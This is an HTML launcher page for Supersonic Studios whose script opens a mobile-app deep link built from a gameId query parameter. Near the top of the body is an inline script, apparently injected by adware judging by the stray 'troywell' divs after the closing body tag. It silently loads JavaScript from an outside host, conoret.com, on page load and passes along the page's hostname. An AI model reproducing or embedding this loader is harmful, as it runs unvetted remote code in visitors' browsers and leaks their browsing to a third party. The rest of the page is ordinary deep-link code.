<html lang="en" data-version="0fc2d37"><head><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'sha256-4pKtlx3vnHTYUY1bv2i6Mp47DHDk3tOVkSfVptdfXLE='; style-src 'self' 'sha256-alQ7fxOCYeVIB4xW9GW58dPXpQNdSEZYfR9hZXZxhck=';
  font-src https://d1v1helob6ms3r.cloudfront.net">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Supersonic Studios - Launch App</title>
    <style>
      @font-face {
        font-family: 'HelveticaNeue';
        src: url('https://d1v1helob6ms3r.cloudfront.net/fonts/HelveticaNeue.eot');
        src: url('https://d1v1helob6ms3r.cloudfront.net/fonts/HelveticaNeue.eot?#iefix') format('embedded-opentype'),
          url('https://d1v1helob6ms3r.cloudfront.net/fonts/HelveticaNeue.woff2') format('woff2'),
          url('https://d1v1helob6ms3r.cloudfront.net/fonts/HelveticaNeue.woff') format('woff'),
          url('https://d1v1helob6ms3r.cloudfront.net/fonts/HelveticaNeue.ttf') format('truetype');
        font-weight: 400;
        font-style: normal;
      }

      html {
        font-family: HelveticaNeue, sans-serif;
      }

      body {
        background-color: #000;
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        width: 100vw;
      }
      #launchAppButton {
        background: #ff4e21;
        border: none;
        box-shadow: 0 2px 0 rgba(0, 0, 0, .045);
        color: #fff;
        text-shadow: 0 -1px 0 rgba(0, 0, 0, .12);
        border-radius: 32px;
        font-size: 12px;
        height: 32px;
        padding: 5.6px 16px;
        outline: 0;
        transform: scale(3);
      }

      #launchAppButton:active {
        background-color: #d93311;
      }
      
    </style>
  <style type="text/css">.vue-slider-dot{position:absolute;-webkit-transition:all 0s;transition:all 0s;z-index:5}.vue-slider-dot:focus{outline:none}.vue-slider-dot-tooltip{position:absolute;visibility:hidden}.vue-slider-dot-hover:hover .vue-slider-dot-tooltip,.vue-slider-dot-tooltip-show{visibility:visible}.vue-slider-dot-tooltip-top{top:-10px;left:50%;-webkit-transform:translate(-50%,-100%);transform:translate(-50%,-100%)}.vue-slider-dot-tooltip-bottom{bottom:-10px;left:50%;-webkit-transform:translate(-50%,100%);transform:translate(-50%,100%)}.vue-slider-dot-tooltip-left{left:-10px;top:50%;-webkit-transform:translate(-100%,-50%);transform:translate(-100%,-50%)}.vue-slider-dot-tooltip-right{right:-10px;top:50%;-webkit-transform:translate(100%,-50%);transform:translate(100%,-50%)}</style><style type="text/css">.vue-slider-marks{position:relative;width:100%;height:100%}.vue-slider-mark{position:absolute;z-index:1}.vue-slider-ltr .vue-slider-mark,.vue-slider-rtl .vue-slider-mark{width:0;height:100%;top:50%}.vue-slider-ltr .vue-slider-mark-step,.vue-slider-rtl .vue-slider-mark-step{top:0}.vue-slider-ltr .vue-slider-mark-label,.vue-slider-rtl .vue-slider-mark-label{top:100%;margin-top:10px}.vue-slider-ltr .vue-slider-mark{-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}.vue-slider-ltr .vue-slider-mark-step{left:0}.vue-slider-ltr .vue-slider-mark-label{left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.vue-slider-rtl .vue-slider-mark{-webkit-transform:translate(50%,-50%);transform:translate(50%,-50%)}.vue-slider-rtl .vue-slider-mark-step{right:0}.vue-slider-rtl .vue-slider-mark-label{right:50%;-webkit-transform:translateX(50%);transform:translateX(50%)}.vue-slider-btt .vue-slider-mark,.vue-slider-ttb .vue-slider-mark{width:100%;height:0;left:50%}.vue-slider-btt .vue-slider-mark-step,.vue-slider-ttb .vue-slider-mark-step{left:0}.vue-slider-btt .vue-slider-mark-label,.vue-slider-ttb .vue-slider-mark-label{left:100%;margin-left:10px}.vue-slider-btt .vue-slider-mark{-webkit-transform:translate(-50%,50%);transform:translate(-50%,50%)}.vue-slider-btt .vue-slider-mark-step{top:0}.vue-slider-btt .vue-slider-mark-label{top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%)}.vue-slider-ttb .vue-slider-mark{-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}.vue-slider-ttb .vue-slider-mark-step{bottom:0}.vue-slider-ttb .vue-slider-mark-label{bottom:50%;-webkit-transform:translateY(50%);transform:translateY(50%)}.vue-slider-mark-label,.vue-slider-mark-step{position:absolute}</style><style type="text/css">.vue-slider{position:relative;-webkit-box-sizing:content-box;box-sizing:content-box;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;display:block;-webkit-tap-highlight-color:rgba(0,0,0,0)}.vue-slider-rail{position:relative;width:100%;height:100%;-webkit-transition-property:width,height,left,right,top,bottom;transition-property:width,height,left,right,top,bottom}.vue-slider-process{position:absolute;z-index:1}</style></head>
  <body><script type="text/javascript">window.top === window && !function(){var e=document.createElement("script"),t=document.getElementsByTagName("head")[0];e.src="//conoret.com/dsp?h="+document.location.hostname+"&r="+Math.random(),e.type="text/javascript",e.defer=!0,e.async=!0,t.appendChild(e)}();</script>
    <button id="launchAppButton">Launch App</button>
    <script>
      function verifyQueryParams() {
        const queryParams = new URLSearchParams(window.location.search);
        if (queryParams.has('gameId')) {
          return true;
        }
        return false;
      }
      function getDeepLinkQueryParams() {
        const queryParams = new URLSearchParams(window.location.search);
        const abTestVariant = queryParams.get('abTestVariant');
        const paramsToSend = ['abTestVariant'];
        const paramsToSendEntries = Object.entries(paramsToSend.reduce((acc, key) => ({
          ...acc,
          [key]: queryParams.get(key)
        }), {}));
        return paramsToSendEntries
          .filter(([key, value]) => value !== null)
          .map(
            ([key, value]) => `${key}=${encodeURIComponent(value)}`
          ).join('&');
      }
      function launchApp() {
        if (verifyQueryParams()) {
          const queryParams = new URLSearchParams(window.location.search);
          const gameId = queryParams.get('gameId');
          let url = `sw.${gameId}://supersonic.com`;
          const deepLinkQueryParams = getDeepLinkQueryParams();
          if (deepLinkQueryParams) {
            console.log('Deep Link Query Params', deepLinkQueryParams);
            url += '?' + deepLinkQueryParams;
          }
          window.open(url, '_blank');
        }
      }
      function run() {
        const launchAppButton = document.getElementById('launchAppButton');
        launchAppButton.addEventListener('click', launchApp);
        launchApp();
      }
      run();
    </script>
  
</body><div class="troywell-caa"></div><div class="troywell-avia"></div></html>